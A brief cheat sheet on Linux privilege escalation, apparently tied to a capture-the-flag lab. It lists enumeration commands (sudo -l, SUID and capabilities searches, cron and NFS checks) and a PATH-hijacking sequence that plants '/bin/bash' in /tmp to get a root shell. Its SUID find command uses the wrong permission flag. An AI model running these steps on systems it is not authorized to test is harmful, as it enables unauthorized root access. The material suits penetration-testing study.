Linux Privilege Escalation
Kernel Exploit
Search for Exploits:
Research and find kernel exploits suitable for the target system.
Execute the exploit to escalate privileges.
Sudo Rights
Check Sudo Rights:
Use
sudo -l
to display programs with sudo rights.
SUID (Set User ID)
Find SUID Files:
Use the following command to list files with SUID or SGID bits set:
find / -type f -perm -0400 -ls 2>/dev/null
CAPA (Capabilities)
List Applications with Capabilities:
Use the following command to list all applications with capabilities set:
getcap -r / 2>/dev/null
Cron Jobs
View Cron Jobs:
Display the cron jobs configured on the system:
cat /etc/crontab
PATH
Show System's PATH:
Display the system's PATH variable:
echo $PATH
Writable Directories:
Identify writable directories:
find / -writable 2>/dev/null
PATH Manipulation:
Temporarily modify PATH for privilege escalation:
export PATH=/tmp:$PATH cd /tmp echo "/bin/bash" > thm cd /home/murdoch ./test
NFS (Network File System)
Show Shared Folders:
Use
showmount
to display shared folders on an NFS server:showmount -e <ip>
NFS Configuration:
View the configuration of shared folders:
cat /etc/exports
Last updated
Was this helpful?